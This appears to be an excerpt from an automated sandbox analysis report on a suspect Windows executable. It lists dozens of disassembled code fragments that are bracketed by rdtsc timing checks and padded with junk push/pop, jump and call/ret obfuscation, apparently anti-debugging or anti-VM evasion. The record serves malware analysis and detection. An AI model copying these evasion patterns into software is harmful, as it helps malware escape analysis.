Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 446957 second address: 4469B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED556h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 75C169CDh 0x00000012 call 00007FD1807ED54Bh 0x00000017 mov dl, bh 0x00000019 pop edi 0x0000001a lea ebx, dword ptr [ebp+1245B3D3h] 0x00000020 jng 00007FD1807ED54Ch 0x00000026 xchg eax, ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FD1807ED558h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4469B7 second address: 4469BD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4469BD second address: 4469D8 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD1807ED54Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jl 00007FD1807ED546h 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 467B79 second address: 467B84 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 467B84 second address: 467B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD1807ED546h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 465BCA second address: 465BD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4663BB second address: 4663D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4663D1 second address: 4663D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 466534 second address: 46653D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 46681F second address: 466825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 46697A second address: 466984 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD1807ED546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 466984 second address: 466990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 45CEAE second address: 45CEB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 467761 second address: 467772 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Ch 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 467772 second address: 467797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD1807ED54Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD1807ED54Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4295BB second address: 4295C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4295C1 second address: 4295C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4295C5 second address: 4295CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4295CD second address: 4295D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4295D3 second address: 4295D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4295D7 second address: 4295E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FD1807ED546h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 46D26A second address: 46D275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD180B5C156h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 46D275 second address: 46D2A5 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD1807ED54Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD1807ED551h 0x00000011 jmp 00007FD1807ED54Fh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 46D2A5 second address: 46D2AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 46D2AB second address: 46D2B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 46D2B1 second address: 46D2B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 43537D second address: 435398 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FD1807ED553h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 435398 second address: 43539C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 47372B second address: 473732 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 473732 second address: 47373A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 473A17 second address: 473A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD1807ED552h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 473A2D second address: 473A33 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 473D4A second address: 473D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 473EFA second address: 473EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 473EFE second address: 473F04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 473F04 second address: 473F11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4775C7 second address: 4775D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 477851 second address: 477857 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 47794C second address: 477950 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 477FED second address: 477FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 477FF2 second address: 47800E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD1807ED558h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 47828A second address: 478297 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 478297 second address: 47829B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 47829B second address: 4782A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4782A5 second address: 4782A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 478B94 second address: 478BD2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD180B5C156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c ja 00007FD180B5C164h 0x00000012 nop 0x00000013 mov dword ptr [ebp+1245A7BFh], esi 0x00000019 push 00000000h 0x0000001b mov esi, dword ptr [ebp+122D2BCBh] 0x00000021 push 00000000h 0x00000023 sub edi, dword ptr [ebp+122D2BEBh] 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f pop edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 479562 second address: 479566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 47A5F7 second address: 47A606 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 47A606 second address: 47A66D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD1807ED559h 0x00000009 popad 0x0000000a pop esi 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D1BD9h], ecx 0x00000012 push 00000000h 0x00000014 mov esi, dword ptr [ebp+122D2CDFh] 0x0000001a push 00000000h 0x0000001c jmp 00007FD1807ED553h 0x00000021 xchg eax, ebx 0x00000022 jmp 00007FD1807ED559h 0x00000027 push eax 0x00000028 push ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b jc 00007FD1807ED546h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 47CB88 second address: 47CB93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FD180B5C156h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 47B8CA second address: 47B8CF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 43BD85 second address: 43BDA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FD180B5C158h 0x0000000b pushad 0x0000000c jmp 00007FD180B5C15Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 47DEE3 second address: 47DEED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 47DEED second address: 47DF07 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD180B5C156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FD180B5C15Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 47DC5E second address: 47DC79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD1807ED557h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 47DF07 second address: 47DF42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C168h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+122D1C93h], ebx 0x00000010 push 00000000h 0x00000012 stc 0x00000013 push 00000000h 0x00000015 mov edi, eax 0x00000017 mov edi, dword ptr [ebp+122D2B17h] 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jl 00007FD180B5C15Ch 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 47DC79 second address: 47DC95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED550h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 47DF42 second address: 47DF46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 47DC95 second address: 47DC99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 47E94D second address: 47E952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 47E952 second address: 47E96E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD1807ED558h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 47E96E second address: 47E9EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b add dword ptr [ebp+122D30A3h], edi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FD180B5C158h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007FD180B5C158h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 00000014h 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 jmp 00007FD180B5C164h 0x0000004e xchg eax, ebx 0x0000004f push eax 0x00000050 je 00007FD180B5C15Ch 0x00000056 jl 00007FD180B5C156h 0x0000005c pop eax 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 47E9EB second address: 47E9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 47E9EF second address: 47E9F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 47E9F5 second address: 47E9FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FD1807ED546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 47F41C second address: 47F420 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 47F420 second address: 47F47C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FD1807ED552h 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 mov edi, dword ptr [ebp+122D2CD3h] 0x00000016 push 00000000h 0x00000018 mov edi, dword ptr [ebp+122D2F25h] 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebx 0x00000023 call 00007FD1807ED548h 0x00000028 pop ebx 0x00000029 mov dword ptr [esp+04h], ebx 0x0000002d add dword ptr [esp+04h], 00000016h 0x00000035 inc ebx 0x00000036 push ebx 0x00000037 ret 0x00000038 pop ebx 0x00000039 ret 0x0000003a mov si, bx 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jnc 00007FD1807ED54Ch 0x00000046 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 481EA9 second address: 481EBB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007FD180B5C156h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4842BE second address: 484377 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FD1807ED557h 0x0000000c pop ecx 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007FD1807ED548h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b mov edi, dword ptr [ebp+122D2AAFh] 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007FD1807ED548h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 0000001Dh 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d mov edi, dword ptr [ebp+122D2C1Bh] 0x00000053 push 00000000h 0x00000055 jo 00007FD1807ED55Ch 0x0000005b pushad 0x0000005c pushad 0x0000005d popad 0x0000005e jmp 00007FD1807ED552h 0x00000063 popad 0x00000064 xchg eax, esi 0x00000065 jmp 00007FD1807ED555h 0x0000006a push eax 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e jo 00007FD1807ED546h 0x00000074 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 484377 second address: 48437B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4844E5 second address: 4844EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4844EC second address: 484507 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C162h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 484507 second address: 48450D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4855CB second address: 4855CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4871AB second address: 4871B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4855CF second address: 4855E0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD180B5C156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4871B1 second address: 4871B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4871B5 second address: 4871EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jng 00007FD180B5C169h 0x00000013 jmp 00007FD180B5C163h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4871EB second address: 4871EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 488276 second address: 4882E8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007FD180B5C158h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 jnc 00007FD180B5C15Ch 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007FD180B5C158h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 0000001Ch 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 mov bx, ax 0x00000048 mov di, 24E3h 0x0000004c push 00000000h 0x0000004e mov edi, dword ptr [ebp+12463303h] 0x00000054 xchg eax, esi 0x00000055 push eax 0x00000056 push edx 0x00000057 jl 00007FD180B5C158h 0x0000005d push ebx 0x0000005e pop ebx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4873B2 second address: 4873B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 48A4DD second address: 48A4E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FD180B5C156h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 48B5DA second address: 48B5DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 48C343 second address: 48C347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
